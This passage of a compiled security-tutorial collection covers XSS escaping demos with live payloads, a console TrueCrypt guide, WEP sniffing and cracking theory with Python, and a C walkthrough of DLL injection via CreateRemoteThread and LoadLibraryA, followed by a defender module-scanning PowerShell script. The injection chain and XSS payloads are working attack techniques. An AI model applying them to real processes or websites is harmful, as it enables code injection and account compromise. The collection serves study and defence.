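    """The s.prop2 line from the tutorial with the (already escaped) value dropped in."""
    return 's.prop2="%s";' % escaped


def htmlentities_ent_compat(value):
    """PHP htmlentities() without ENT_QUOTES: &, <, > and " are encoded, ' is left alone."""
    return html.escape(value, quote=False).replace('"', "&quot;")


def htmlentities_ent_quotes(value):
    """htmlentities($var, ENT_QUOTES): the single quote is encoded too."""
    return html.escape(value, quote=True)


def render_radio(escaped):
    """The single-quoted attribute from the audited search.php listing."""
    return "<input type='radio' value='flag' checked='%s' />" % escaped


def attribute_breaks_out(escaped, quote="'"):
    """Inside a quoted attribute the only thing that ends it is the same quote character."""
    return quote in escaped


def demo():
    """Which of the four filters let the payload out of its context (True = vulnerable)."""
    return {
        "js_naive": js_string_terminates_early(naive_js_escape(JS_PAYLOAD)),
        "js_safe": js_string_terminates_early(safe_js_escape(JS_PAYLOAD)),
        "attr_ent_compat": attribute_breaks_out(htmlentities_ent_compat(ATTR_PAYLOAD)),
        "attr_ent_quotes": attribute_breaks_out(htmlentities_ent_quotes(ATTR_PAYLOAD)),
    }


if __name__ == "__main__":
    print(render_script(naive_js_escape(JS_PAYLOAD)))   # the quote is live: alert(0) runs
    print(render_script(safe_js_escape(JS_PAYLOAD)))    # still one string literal
    print(render_radio(htmlentities_ent_compat(ATTR_PAYLOAD)))
    print(demo())
```

The lexer-style check is the test to reuse when auditing: feed it exactly the bytes the page emits between the quotes, not your input, because (as Case C shows) the filter's output is what the browser parses.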
23. Truecrypt's Guide

Contents
* Introduction
* What's Truecrypt and what are its advantages
* Things to know before you try
* Using truecrypt
* Common Problems
* Conclusion

Introduction

This is just a little guide about using truecrypt. I'm writing it because this great tool has been mentioned several times in r00tsec but there's no guide to using it yet. Many sites don't have a truecrypt guide because its use is fairly easy; however, every guide (including the Official Beginner's Manual) is about truecrypt's GUI, which works in interactive mode. This is why this guide is about using truecrypt from the console, and it will be a Linux-based guide.

If you're like me, you'll find every possible occasion to use a console command instead of a GUI, so this guide is for you. It isn't perfect, it isn't the greatest, but I'll do my best to cover the things that create the most confusion about the tool. It will also (try to) be easy to follow both for those who are using the tool for the first time and for those who already know it.

For convenience, I will be using several terms to define different things: by "virtual volumes" I mean a group of clusters (a reserved chunk of space on a hard drive or hard drive partition), by "real volumes" I mean entire hard drives or partitions, and by "removable volumes" I mean any removable device (like USB hard drives).

What's Truecrypt and what are its advantages

Truecrypt is an open-source tool built with privacy in mind. It is also referred to as hard-disk encryption software and, as of today, is portable across most of the major systems. It works by encrypting the data 'on-the-fly': if I open a music file that is saved on an encrypted volume, the file is decrypted in RAM as the music player asks for the data; when saving, all the encryption likewise happens in RAM while truecrypt writes the file(s) to the volume.
From paranoids to companies, this is the best tool to use when you want to keep your information private from prying eyes. If you're looking for a solution to keep your things private, this tool will be your best friend for sure!

Truecrypt is loved by many because it has many important features; this is a list of them:

* Portable: Can be used on several of the major operating systems around: Windows, Linux and Mac OS X.
* Volume scope: You can encrypt just a portion of a disk or disk partition by creating a virtual volume, you can encrypt a partition or hard drive entirely, and you can encrypt removable devices.
* Several algorithms: At the time of this writing, Truecrypt supports three encryption algorithms: AES, Twofish and Serpent.
* Cascades: Related to the above, one of the best ways to enforce security is that you can use two or three algorithms at the same time. This is what is called a cascade, and the available ones are: AES-Twofish, AES-Twofish-Serpent, Serpent-AES, Serpent-Twofish-AES and Twofish-Serpent.
* Several hashes: Besides the ciphers, truecrypt uses hash functions to derive random values from the password and key files. At the time of this writing there are only three hashes available: SHA-1, RIPEMD-160 and Whirlpool.
* Passwords and key files: Truecrypt is flexible in that you can use only a password to protect the encrypted volume, or a password plus key files. The key files are extra random data that is mixed in when the key is derived from the password, and the great thing is that any kind of file, and even entire directories, can be used as a key file, meaning that you can use an mp3 file or an avi video file as a key file.
* Interfaces: The tool can be used through a GUI (Graphical User Interface) or from the console, which offers wider portability.
* Interactive use: For those who are starting to use the tool, this is the best.
Interactive mode is used by truecrypt when no parameters are passed to the initial command; this means that truecrypt will ask the user for every piece of information needed to create an encrypted volume, thus avoiding errors that new users might make.
* Two kinds of volumes: There are normal volumes and hidden volumes. At the beginning, every volume is a normal one; hidden volumes are created inside normal volumes as a way to improve the privacy of the data.
* Plausible deniability: Related to the previous point, this is by far one of the greatest advantages of this tool. Basically, since every truecrypt volume, unless decrypted, looks like random data, it's almost impossible to prove that such a truecrypt volume exists. Besides that, if the normal volume is exposed (someone forces you to give up the access password), it's impossible to tell that there's a hidden volume inside it, and thus to get at the information saved in that hidden volume.

You can't deny that there are a lot of advantages to this tool, and best of all, it's free.

Things to know before you try

When it comes to Linux systems, you need specific kernel support in order "to use" truecrypt volumes; not to create them, just to use them. Also, the specific support you'll need depends on the truecrypt version you're using. Right now there are two major versions of the tool in use, 4.3a and 5.1a, and these two have at least one very important difference regarding Linux support: 4.3a uses the device mapper while 5.1a uses FUSE (Filesystem in Userspace). Also, no matter which version of truecrypt you are using, you need loop device support in the kernel.
So the first thing you need to check before starting to use truecrypt is that you have kernel support (activate them as modules or built-in according to the truecrypt version you use):

Device Drivers --> Multiple devices driver support (RAID and LVM) --> Device mapper support
File systems --> Filesystem in Userspace support
Device Drivers --> Block devices --> Loopback device support

Using truecrypt

If you're starting to use this tool you need to understand at least how to encrypt what you need to encrypt, and for this you need to understand that there are different scopes and kinds of volumes.

Virtual volumes: Let's say you have a Linux partition on /dev/sda4 and this partition has 20GB of space. Now, virtual volumes are just a portion that can be reserved from a partition (or a hard drive if it has no partitions); basically, it is just a file with a fixed length that you create on a partition or hard drive. On /dev/sda4 a virtual volume could be one single file called private of about 5GB, so in turn you have /dev/sda4 as a partition of 20GB with a file of 5GB on it. I call them virtual volumes because every truecrypt volume needs to be mounted and worked with as if it were a single disk, so, even when it's actually just a file, it needs to be treated as if it were a real disk on your system.

Real volumes: Remember, as I said in the introduction, I'm using these terms for convenience so you can easily understand the way it all works; by real volumes I mean any partition or entire hard drive that's going to be encrypted. For instance, take the above example: you have a partition called /dev/sda4 of about 20GB. You can encrypt the partition entirely, not just create a file on it; in the same way, if you have only one disk with no partitions at all, you can encrypt it completely. Those are real volumes.

Removable volumes: These are just any kind of removable device where you can save data, like USB hard drives, flash drives and such.
Every truecrypt volume needs a path (like /media/sda4/private) which is then mapped to a device in /dev; if it's a virtual volume, it will be mapped to /dev/mapper/truecryptN. This path is where the truecrypt volume lives, and it is important (required) to give it in order to create the volume. To use the volume, besides a known path, you need a mount point (like /mnt/something or /media/data). This is only used once the truecrypt volume has been created and mapped to a device in /dev, and this mount point is where you actually save or access the data that is in the truecrypt volume. No worries if you don't catch this yet, you'll understand it later.

As I said before, this guide is about using truecrypt from the console on Linux systems; for a guide about using the graphical interface please refer to the official user's guide: TrueCrypt - Free Open-Source Disk Encryption Software - Documentation - Tutorial 1/5

From the command line, truecrypt has many parameters that can be used to create your volumes. I won't cover every possible use of those parameters, so you can check all the options available by issuing the command:

root@root [~]# truecrypt --help

However, if you've been following me so far, you should remember that I talked about the interactive mode in the advantages of truecrypt section. The great thing about this mode of operation is that you don't really need to know any other parameter in order to create a truecrypt volume. From the command line, interactive mode is called like this:

root@root [~]# truecrypt --interactive

In this mode, the program will ask you everything it needs to know to create a volume: the volume path, a password, a hash, a key file (optional), and other important stuff.
This mode can also be entered by truecrypt itself if the user passed some parameters but not all of those required to create the volume. For instance, let's say we create a volume called private with the password uid0R00tS3c; the command could be something like this:

root@root [~]# truecrypt --password uid0R00tS3c --create /media/hda3/private

The thing with the above command is that it lacks other important information, for example the hash that should be used for the password. In this case truecrypt will notice that not all the needed parameters were given up front, so it will start to ask the user for all the missing data. (Keep in mind that a password given on the command line ends up in your shell history and is visible to other users in the process list while the command runs; letting interactive mode prompt for it avoids both.)

Moving on, using truecrypt is incredibly easy, mostly thanks to the interactive mode. Starting from here, I'll be showing several ways to use the tool to better fit your needs; feel free to ask or add whatever you think will improve this guide. For convenience, I'll be using two example disks: one is a partition /dev/hda2 that is mounted on /media/data, and the other will be an entire disk /dev/sda1 that will be mounted on /media/mydisk.

Create a volume called 'private' on /dev/hda2:
root@root [~]# truecrypt --create /media/data/private

Create a volume called 'private' using the password R00tS3c:
root@root [~]# truecrypt --password R00tS3c --create /media/data/private

Create a volume called 'private' using a password and the Twofish algorithm:
root@root [~]# truecrypt --password R00tS3c --encryption Twofish --create /media/data/private

Create a volume called 'private' with a blank password but using a key file:
root@root [~]# truecrypt --password '' --keyfile /home/rootsec/logo.jpg --create /media/data/private

Create a volume called 'private' with a password, using cascade encryption and a directory as key file:
root@root [~]# truecrypt --password R00tS3c --keyfile /home/rootsec/documents --encryption AES-Twofish-Serpent --create /media/data/private

Create a volume called 'private' with password, key file, cascade and hash:
root@root [~]# truecrypt --password R00tS3c --keyfile /home/rootsec/mymovie.mpg --encryption Twofish-Serpent --hash SHA-1 --create /media/data/private

Create a key file called 'useme' using the RIPEMD-160 hash:
root@root [~]# truecrypt --keyfile-create --hash RIPEMD-160 /home/rootsec/useme

Add a key file to an existing volume called 'private':
root@root [~]# truecrypt --keyfile-add --change /home/rootsec/useme /media/data/private

Create a volume with a specific filesystem:
root@root [~]# truecrypt --filesystem ext3 --create /media/data/private

Create a volume called 'private' with a password, using a file as random source instead of a hash:
root@root [~]# truecrypt --password R00tS3c --random-source /home/rootsec/drums.mp3 --create /media/data/private

Mount a volume called 'private' on /media/mystuff/:
root@root [~]# truecrypt /media/data/private /media/mystuff

Pass specific options to mount:
root@root [~]# truecrypt --mount-options ro /media/data/private /media/mystuff

The above will mount the truecrypt volume 'private' on /media/mystuff read-only.

Create a volume with a fixed size:
root@root [~]# truecrypt --size 200MB --create /media/data/private

The size can be given in KB, MB or GB; always put one of these, as just putting the number will return an error.

Create a hidden volume:
root@root [~]# truecrypt --create /media/mydisk
root@root [~]# truecrypt --type hidden --size 2GB --create /media/mydisk

As I said before, hidden volumes are created inside normal volumes; this is why we need to create a normal volume first. In this case (if you remember) /media/mydisk is where the example /dev/sda1 disk is mounted. Suppose that this disk is about 100GB; what we're doing here is creating a hidden volume of 2GB inside that disk of 100GB.
Every truecrypt volume is mapped to /dev/mapper/truecryptN where 'N' is a number starting from 0 and assigned by availability. Let's say that you create one truecrypt volume; it'll be mapped to /dev/mapper/truecrypt0. Then you create another one, which will be mapped to /dev/mapper/truecrypt1, then another that will be mapped to /dev/mapper/truecrypt2, and so on. You can change these numbers if you like to avoid the automatic mapping. This is useful when you have several truecrypt volumes and you need to know which is which:

root@root [~]# truecrypt --device-number 10 --create /media/data/private

This will map the truecrypt volume to /dev/mapper/truecrypt10.

Change a volume:
Imagine that you created the volume private with a size of 10GB but now you see that you don't need it to be so big, so let's change that:
root@root [~]# truecrypt --size 5GB --change /media/data/private

When you're doing this, you don't need to specify the old values, just the new ones, so if we want to change the password we use:
root@root [~]# truecrypt --password R00tS3c2 --change /media/data/private

List all mapped (thus mounted) truecrypt volumes:
root@root [~]# truecrypt --list

Unmount a truecrypt volume:
root@root [~]# truecrypt --dismount /media/data/private

Unmount all truecrypt volumes at once:
root@root [~]# truecrypt --dismount

Check the properties of a volume:
root@root [~]# truecrypt --properties /media/data/private

Remove a truecrypt volume:
If it's a virtual volume, all you need to do is delete the file. For instance, if I wanted to remove the 'private' volume created in the previous examples, I'd use:
root@root [~]# rm /media/data/private

If you encrypted an entire partition or disk and you don't want it encrypted anymore, the only thing you can do is reformat it.
Finally, if you want to save or access data in a truecrypt volume, all you have to do is mount it and save the data to the mount point. For instance, if I created the volume 'private' and mounted it on /media/mystuff, all I need to do to save my information in the encrypted volume is copy (or move) the data to /media/mystuff.

Common problems

There are several common problems while using truecrypt, but most of them are related to the lack of kernel support. For the sake of completeness, these are the most common errors:

- Mount Failed:
Yeah, this is all you'll see while trying to mount the volume. This error is caused because device mapper support or FUSE (depending on the truecrypt version used) isn't active.

- Wrong FS:
So, you're going to mount the volume and it shows:

mount: wrong fs type, bad option, bad superblock on /dev/mapper/truecrypt0,
       missing codepage or other error
       In some cases useful info is found in syslog - try
       dmesg | tail  or so

When creating volumes (unless the --filesystem option is used), truecrypt creates those volumes with the 'auto' filesystem which, for Linux purposes, doesn't work at all, so in order to avoid this error you'll need to create a filesystem in the volume like this:

root@root [~]# truecrypt --device-number 20 /media/data/private /media/mystuff && mkreiserfs /dev/mapper/truecrypt20

To actually create a filesystem on the truecrypt device it first needs to be mapped; that's why you mount it first and immediately afterwards create the filesystem you want. I used reiserfs but you can use whatever you like. The '--device-number' option is optional; I used it because it's better if you want to control which device you're going to format.

- No free loopback device available:
This error is due to the lack of loop device support in the kernel (Device Drivers --> Block devices --> Loopback device support).
Conclusion

So we've come to the end of this guide. I hope you liked it; I tried to be as specific as I could and to reach both those who know the tool and those who don't. However, this is not a strict guide, meaning that you can discuss, share, provide more examples of use or anything you like.

Regards

Source: Truecrypt's Guide - r00tsecurity
24. Wireless Network Sniffing

Sniffing is eavesdropping on the network. A (packet) sniffer is a program that intercepts and decodes network traffic broadcast through a medium. Sniffing is the act by a machine S of making copies of a network packet sent by machine A and intended to be received by machine B. Such sniffing, strictly speaking, is not a TCP/IP problem, but it is enabled by the choice of broadcast media, Ethernet and 802.11, as the physical and data link layers.

Sniffing has long been a reconnaissance technique used in wired networks. Attackers sniff the frames necessary to enable the exploits described in later sections. Sniffing is the underlying technique used in tools that monitor the health of a network. Sniffing can also help find the easy kill, as in scanning for open access points that allow anyone to connect, or capturing the passwords used in a connection session that does not even use WEP, or in telnet, rlogin and ftp connections.

It is easier to sniff wireless networks than wired ones. It is easy to sniff the wireless traffic of a building by setting up shop in a car parked in a lot as far away as a mile, or while driving around the block. In a wired network, the attacker must find a way to install a sniffer on one or more of the hosts in the targeted subnet. Depending on the equipment used in a LAN, a sniffer needs to be run either on the victim machine whose traffic is of interest or on some other host in the same subnet as the victim. An attacker at large on the Internet has other techniques that make it possible to install a sniffer remotely on the victim machine.

Passive Scanning

Scanning is the act of sniffing by tuning to the various radio channels of the devices. A passive network scanner instructs the wireless card to listen to each channel for a few messages. This does not reveal the presence of the scanner. An attacker can passively scan without transmitting at all. Several modes of a station permit this.
There is a mode called RF monitor mode that allows every frame appearing on a channel to be copied as the radio of the station tunes to various channels. This is analogous to placing a wired Ethernet card in promiscuous mode. This mode is not enabled by default. Some wireless cards on the market today have disabled this feature in the default firmware. One can buy wireless cards whose firmware and corresponding driver software together permit reading of all raw 802.11 frames. A station in monitor mode can capture packets without associating with an AP or ad-hoc network. The so-called promiscuous mode allows the capture of all wireless packets of an associated network. In this mode, packets cannot be read until authentication and association are completed. An example sniffer is Kismet. An example wireless card that permits RF monitor mode is the Cisco Aironet AIR-PCM342.

Detection of SSID

The attacker can usually discover the SSID of a network by passive scanning because the SSID occurs in the following frame types: Beacon, Probe Request, Probe Response, Association Request, and Reassociation Request. Recall that management frames are always in the clear, even when WEP is enabled. On a number of APs, it is possible to configure them so that the SSID transmitted in the Beacon frames is masked, or even to turn off Beacons altogether. The SSID shown in the Beacon frames is set to null in the hope of making the WLAN invisible unless a client already knows the correct SSID. In such a case, a station wishing to join a WLAN begins the association process by sending Probe Requests, since it could not detect any APs via Beacons that match its SSID. If the Beacons are not turned off, and the SSID in them is not set to null, an attacker obtains the SSID included in the Beacon frame by passive scanning. When the Beacon displays a null SSID, there are two possibilities. Eventually, an Associate Request may appear from a legitimate station that already has a correct SSID.
To such a request, there will be an Associate Response frame from the AP. Both frames will contain the SSID in the clear, and the attacker sniffs these. If the station wishes to join any available AP, it sends Probe Requests on all channels and listens for Probe Responses that contain the SSIDs of the APs. The station considers all Probe Responses, just as it would have with the non-empty SSID Beacon frames, to select an AP. Normal association then begins. The attacker waits to sniff these Probe Responses and extract the SSIDs. If Beacon transmission is disabled, the attacker has two choices. The attacker can keep sniffing, waiting for a voluntary Associate Request to appear from a legitimate station that already has a correct SSID, and sniff the SSID as described above. The attacker can also choose to actively probe by injecting frames that he constructs, and then sniff the response, as described in a later section. When the above methods fail, SSID discovery is done by active scanning.

Collecting the MAC Addresses

The attacker gathers legitimate MAC addresses for use later in constructing spoofed frames. The source and destination MAC addresses are always in the clear in all the frames. There are two reasons why an attacker would collect MAC addresses of stations and APs participating in a wireless network. (1) The attacker wishes to use these values in spoofed frames so that his station or AP is not identified. (2) The targeted AP may be controlling access by filtering out frames with MAC addresses that were not registered.

Collecting the Frames for Cracking WEP

The goal of an attacker is to discover the WEP shared-secret key. Often, the shared key can be discovered by guesswork based on a certain amount of social engineering regarding the administrator who configures the wireless LAN and all its users. Some client software stores the WEP keys in the operating system registry or initialization scripts.
In the following, we assume that the attacker was unsuccessful in obtaining the key in this manner. The attacker then employs systematic procedures for cracking WEP. For this purpose, a large number (millions) of frames need to be collected because of the way WEP works. The wireless device generates on the fly an Initialization Vector (IV) of 24 bits. Adding these bits to the shared-secret key of either 40 or 104 bits, we often speak of 64- or 128-bit encryption. WEP generates a pseudo-random key stream (with RC4) from the shared secret key and the IV. The CRC-32 checksum of the plaintext, known as the Integrity Check (IC) field, is appended to the data to be sent. It is then exclusive-ORed with the pseudo-random key stream to produce the ciphertext. The IV is sent in the clear, in front of the ciphertext. The receiver extracts the IV, uses the secret key to regenerate the key stream, and exclusive-ORs the received ciphertext to yield the original plaintext. Certain cards are so simplistic that they start their IV at 0 and increment it by 1 for each frame, resetting in between for some events. Even the better cards generate weak IVs from which the first few bytes of the shared key can be computed after statistical analysis. Some implementations generate fewer mathematically weak vectors than others do. The attacker sniffs a large number of frames from a single BSS. These frames all use the same key. The mathematics behind the systematic computation of the secret shared key from a collection of ciphertext extracted from these frames is described elsewhere in this volume. What is needed, however, is a collection of frames that were encrypted using "mathematically weak" IVs. The number of encrypted frames that were mathematically weak is a small percentage of all frames. In a collection of a million frames, there may only be a hundred mathematically weak frames.
It is conceivable that the collection may take a few hours to several days depending on how busy the WLAN is. Given a sufficient number of mathematically weak frames, the systematic computation that exposes the bytes of the secret key is intensive. However, an attacker can employ powerful computers. On an average PC, this may take a few seconds to hours. The storage of the large number of frames is in the several hundred megabytes to a few gigabytes range. An example of a WEP cracking tool is AirSnort (AirSnort Homepage).

Detection of the Sniffers

Detecting the presence of a wireless sniffer who remains radio-silent, through network security measures, is virtually impossible. Once the attacker begins probing (i.e., by injecting packets), the presence and the coordinates of the wireless device can be detected.

Source: Wireless Network Sniffing - r00tsecurity
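The WEP encapsulation described in the two paragraphs on cracking WEP, as an added example (Python 3) that is not part of the r00tsecurity text: RC4 keystream from IV || key, CRC-32 integrity check, XOR, IV in the clear; then the two things a sniffer gets for free from a frame collection without touching the key: IV reuse (the XOR of two ciphertexts under the same IV cancels the keystream) and a known plaintext yielding the keystream for that IV. fms_weak_key_index() flags the classic FMS weak IVs of the form (A+3, 0xFF, X), one class of the "mathematically weak" IVs the text refers to; the statistical key-recovery itself is not implemented here. Key, IVs and frame contents in the test are constructed data, and the key-ID byte that follows the IV on the air is omitted.

```python
import struct
import zlib


def rc4_keystream(key, length):
    """RC4 key scheduling + PRGA exactly as WEP uses it (no keystream bytes discarded)."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _icv(plaintext):
    """WEP integrity check: CRC-32 of the plaintext, little-endian, 4 bytes."""
    return struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)


def wep_encrypt(shared_key, iv, plaintext):
    """Frame body: IV (clear) || RC4(IV || key) XOR (plaintext || ICV)."""
    assert len(iv) == 3 and len(shared_key) in (5, 13)      # 40- or 104-bit key
    data = plaintext + _icv(plaintext)
    return iv + xor(data, rc4_keystream(iv + shared_key, len(data)))


def wep_decrypt(shared_key, frame):
    """Receiver side: rebuild the keystream from the clear IV, XOR, verify the ICV."""
    iv, body = frame[:3], frame[3:]
    data = xor(body, rc4_keystream(iv + shared_key, len(body)))
    plaintext, icv = data[:-4], data[-4:]
    if _icv(plaintext) != icv:
        raise ValueError("ICV mismatch")
    return plaintext


def frame_is_authentic(shared_key, frame):
    try:
        wep_decrypt(shared_key, frame)
        return True
    except ValueError:
        return False


def iv_reuse_leak(frame_a, frame_b):
    """Two frames under the same IV share a keystream, so C_a XOR C_b == P_a XOR P_b:
    the sniffer learns the XOR of the plaintexts without knowing the key."""
    assert frame_a[:3] == frame_b[:3], "only meaningful for a reused IV"
    return xor(frame_a[3:], frame_b[3:])


def keystream_from_known_plaintext(frame, known_plaintext):
    """A frame whose plaintext is known (e.g. an LLC/SNAP or ARP header) gives back the
    keystream for its IV, which then decrypts any other frame sent under that IV."""
    return xor(frame[3:3 + len(known_plaintext)], known_plaintext)


def decrypt_with_keystream(frame, keystream):
    return xor(frame[3:3 + len(keystream)], keystream)


def fms_we_key_index_doc():
    return "FMS weak IVs: (A+3, 0xFF, X) leaks key byte A"


def fms_weak_key_index(iv, key_len):
    """FMS weak IVs have the form (A+3, 0xFF, X) and leak information about key byte A.
    Returns A, or None if this IV is not of that form for a key of key_len bytes."""
    a = iv[0] - 3
    if iv[1] == 0xFF and 0 <= a < key_len:
        return a
    return None


def count_fms_weak_ivs(key_len):
    """Of the 2**24 possible IVs only key_len * 256 are of the FMS form; every other
    second byte is skipped since fms_weak_key_index() rejects it anyway."""
    return sum(1 for b0 in range(256) for b2 in range(256)
               if fms_weak_key_index(bytes([b0, 0xFF, b2]), key_len) is not None)
```

Both leaks are why the text says IV handling decides how many frames a sniffer needs: a card that restarts its IV at 0 hands the attacker reused IVs after every reset, and the FMS class alone is 1280 of the 16 million IVs for a 40-bit key, which is the "small percentage" the text describes.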
25. [C] Dll Injection

DLL injection is the process in which a DLL is loaded into the memory space of a running process. The injected DLL can then hook, run code or change memory values, because it is running inside that process's address space.

The first thing to do is find the process. There are a few ways to find a certain process, but this is the easiest. To do it we need the help of some Windows functions:

HANDLE WINAPI CreateToolhelp32Snapshot(
  __in DWORD dwFlags,
  __in DWORD th32ProcessID
);

BOOL WINAPI Process32First(
  __in HANDLE hSnapshot,
  __inout LPPROCESSENTRY32 lppe
);

BOOL WINAPI Process32Next(
  __in HANDLE hSnapshot,
  __out LPPROCESSENTRY32 lppe
);

All of these functions are declared in Tlhelp32.h. They take structures that will be used to walk through a snapshot (list) of the processes running on the computer at that moment. Notice that CreateToolhelp32Snapshot returns a handle; this handle refers to the snapshot (list) of processes. The flags just need to be set to TH32CS_SNAPPROCESS and th32ProcessID to 0. Example code:

HANDLE snapshot = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );

Now, to put this snapshot to use you need the Process32First and Process32Next functions. These take another structure, PROCESSENTRY32, which holds the process info, most notably the name of the exe that was used to create the process. There are other things it can be used for, but they're not covered in this tutorial. Before the first call its dwSize member must be set to the size of the structure, otherwise Process32First fails. To get the first process you call Process32First:

PROCESSENTRY32 sentry;
sentry.dwSize = sizeof( PROCESSENTRY32 );
Process32First( snapshot, &sentry );

This could use some error checking, but whatever. It returns the first process in the list. To check whether this is the exe you need, compare the exe name with the one you want to find:

strcmp( sentry.szExeFile, exe );

If this returns 0 then you found the process, and you can get the process ID like this:
sentry.th32ProcessID;

If the first one is not the right one then you will have to loop through the list. To do this you can use any kind of loop you want, but a while loop is best. To loop through the list you use Process32Next (it returns TRUE or FALSE):

while( Process32Next( snapshot, &sentry ) )
{
    if( strcmp( sentry.szExeFile, exe ) == 0 )
        break;
}

This leaves the process ID in the sentry structure and you get it like before (if the loop runs out without a match, Process32Next has returned FALSE and the entry left behind is not the one you want, so check for that). That's all the info you need to write a function that finds a process by name.

Now for the actual injection method. The method that will be used is done with CreateRemoteThread:

HANDLE WINAPI CreateRemoteThread(
  __in HANDLE hProcess,
  __in LPSECURITY_ATTRIBUTES lpThreadAttributes,
  __in SIZE_T dwStackSize,
  __in LPTHREAD_START_ROUTINE lpStartAddress,
  __in LPVOID lpParameter,
  __in DWORD dwCreationFlags,
  __out LPDWORD lpThreadId
);

This needs a little explanation. To get this to work it helps to understand what's needed to make the process load and run our DLL.

hProcess is the process that the DLL will be injected into.
lpThreadAttributes is not needed and can be set to NULL.
dwStackSize is not needed either; this is 0.
lpStartAddress is the address of the function that this thread will call when it's created.
lpParameter is the parameter to be passed to the function on thread creation.
dwCreationFlags is not needed as the thread should run as soon as it's created, so set this to 0.
lpThreadId is not needed unless error checking is wanted.

There are really only 3 parameters in that function that are important: hProcess, lpStartAddress and lpParameter. A few things need to be said about this. It allows us to create a thread (after the process is opened), and this thread will be used to load our DLL. Now, the only way a program can dynamically load a DLL into itself is with

HMODULE LoadLibraryA( const char *lib )

This is the ASCII version of the function and it is the one that will be used.
Ok this function will load a dll into a process's memory space and run the DllMain in the dll. Now to make this usefull we need to call it in the other process and not in ours. To do this we need one other bit of information. Mainly the Address of this function. This address is what will be passed to the CreateRemoteThread function. Now you can probley guess what the lpParameter is gonna be. But before that lets figure out how to get the address of the function. Ok this needs another windows function FARPROC GetProcAdress( HMODULE mod, const char *func ) Ok this is the function it need to take a HMODULE(HANDLE) to the module you want to find the address of the function. The func is the name of the function (LoadLibraryA) and then you need to get the address. Now the best way to store this address is in a LPVOID so this is whats gonna happen. So to get the handle to the module that contains the function were looking for (LoadLibraryA) we need to get this. Another name for module is a DLL so we can use the LoadLibrary function to get a HANDLE to the module (dll) like so: HANDLE kernel = LoadLibrary( "kernel32.dll" ); Ok then you can use the GetProAddress and get the LoadLibraryA address. LPVOID loadlib = (LPVOID)GetProcAddress( kernel, "LoadLibraryA" ); Ok now that we have the address of the function we need to inject(load) our dll into another process. Now One more thing is needed. Notice the parameter for LoadLibrary takes a string. This string needs to be passed to it or it won't work To do this though we can't just have the string in our process and try passing it to the function as this will cause a error. We need to get the string into the other process. Now to do this we have to use some more windows functions. 
HANDLE WINAPI OpenProcess( __in DWORD dwDesiredAccess, __in BOOL bInheritHandle, __in DWORD dwProcessId ); LPVOID WINAPI VirtualAllocEx( __in HANDLE hProcess, __in_opt LPVOID lpAddress, __in SIZE_T dwSize, __in DWORD flAllocationType, __in DWORD flProtect ); BOOL WINAPI WriteProcessMemory( __in HANDLE hProcess, __in LPVOID lpBaseAddress, __in LPCVOID lpBuffer, __in SIZE_T nSize, __out SIZE_T* lpNumberOfBytesWritten ); Ok the first gets a handle to the process with the passed ID, it also specifies what access you want. The next one allocates memory in the opened process. The last writes to this allocated memory. Ok this is kind of the point where all the tut starts to come together. Ok first use the function to get a process ID from the exe name and pass it to openprocess like so. HANDLE proc = OpenProcess( (PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ), FALSE, GetProcIDfromName( SomeEXE ) ); Ok now have a handle to this process you want to inject the dll into. Now you need to allocate space for the dll path (this needs to be the complete full path). To do this call VirtualAllocEx and store the return value in a LPVOID. LPVOID tempmem = VirtualAllocEx( proc, NULL, strlen( fulldllpath ), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE ); Ok now that memory has been allocated for the dll path we can write it to this memory. This will be done with WriteProcessMemory we will pass the LPVOID that was return from VirtualAllocEx as the address of the memory block. WriteProcessMemory( proc, (LPVOID)tempmem, fulldllpath, strlen( fulldllpath ), NULL ); ok that was easy. Finally the injection can happen. Now we go back to the CreateRemoteThread function and pass in all the info we just spent getting. CreateRemoteThread( proc, NULL, 0, (LPTHREAD_START_ROUTINE)loadlibaddr, (LPVOID)tempmem, 0, NULL ); If everything went as planned the dll will be loaded into the remote process or inject. 
With this the dll can set hooks, edit memory, extend or mess with the process. Ok with CreateRemoteThread we passed the process ID that was found with our helper function. The address of the LoadLibraryA function from the kernel32.dll. And the address of the memory we wrote the path of the dll to be injected. Well thats really it. enjoy, elchupathingy. Sursa: [C] Dll Injection - r00tsecurity
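A defender-side counterpart to the post above, added here as an example and not part of the original tutorial or of r00tsecurity's code: a dll brought in through LoadLibraryA is registered by the loader like any other module, so it shows up in the target's module list. The script below walks that list for a given process and flags modules that were loaded from outside a set of trusted directories or that do not carry a valid Authenticode signature. The default trusted roots and the notepad.exe usage at the bottom are assumptions chosen for illustration.

```powershell
# Added defender-side check (not part of the original post): list the modules loaded
# in a process and flag any that do not come from a trusted directory or that lack a
# valid Authenticode signature. A dll loaded into the process via LoadLibraryA, as in
# the tutorial above, appears in this same module list.
function Get-SuspiciousModules {
    param(
        [Parameter(Mandatory)][int]$ProcessId,
        # Directories treated as expected homes for dlls. This default set is an
        # assumption and should be tuned for the host being examined.
        [string[]]$TrustedRoots = @($env:SystemRoot, $env:ProgramFiles, ${env:ProgramFiles(x86)})
    )

    $proc = Get-Process -Id $ProcessId -ErrorAction Stop

    # The process's own folder is also treated as trusted (its private dlls live there).
    $roots = @($TrustedRoots)
    if ($proc.Path) { $roots += (Split-Path -Parent $proc.Path) }
    $roots = $roots | Where-Object { $_ }

    # .Modules throws for a process whose bitness differs from this PowerShell host
    # (32-bit vs 64-bit) and for protected processes; run a host of matching bitness.
    foreach ($m in $proc.Modules) {
        $path = $m.FileName

        $inTrusted = $false
        foreach ($root in $roots) {
            if ($path.StartsWith($root, [System.StringComparison]::OrdinalIgnoreCase)) {
                $inTrusted = $true
                break
            }
        }

        $sig = Get-AuthenticodeSignature -FilePath $path
        if ($inTrusted -and $sig.Status -eq 'Valid') { continue }

        $reason = if (-not $inTrusted) { 'loaded from outside trusted roots' }
                  else { "signature status $($sig.Status)" }

        [pscustomobject]@{
            ProcessId = $ProcessId
            Module    = $m.ModuleName
            Path      = $path
            Signature = $sig.Status
            Reason    = $reason
        }
    }
}

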